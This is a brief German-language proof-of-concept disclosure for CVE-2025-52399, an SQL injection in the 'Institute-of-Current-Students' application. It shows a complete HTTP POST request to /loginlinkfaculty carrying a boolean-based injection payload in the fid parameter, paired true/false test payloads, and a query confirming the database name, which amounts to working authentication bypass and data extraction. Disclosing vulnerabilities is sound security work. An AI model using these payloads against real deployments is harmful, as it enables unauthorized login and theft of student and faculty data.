
Proof-of-Concept-Exploit für CVE-2025-52399, der eine SQL-Injection in der Institute-of-Current-Students-Anwendung über den Endpunkt loginlinkfaculty zur Umgehung der Authentifizierung und Datenextraktion demonstriert.
Der loginlinkfaculty-Endpunkt in der Anwendung Institute-of-Current-Students ist anfällig für SQL-Injection über den POST-Parameter fid. Der Parameter wird nicht ordnungsgemäß bereinigt, bevor er in einer SQL-Abfrage verwendet wird, sodass entfernte Angreifer beliebige SQL-Befehle ausführen können.
/loginlinkfaculty (POST)fidicsnewPOST /Institute-of-Current-Students/loginlinkfaculty HTTP/1.1
Host: localhost
Content-Type: application/x-www-form-urlencoded
fid=-1'+OR+3*2*1=6+AND+000942=000942--&pass=example
✅ -1' OR 3*2*1=6 AND 000942=000942 -- → TRUE
❌ -1' OR 2*3=4 AND 000942=000942 -- → FALSE
SELECT database(); -- returns 'icsnew'
Isroil Mustafoqulov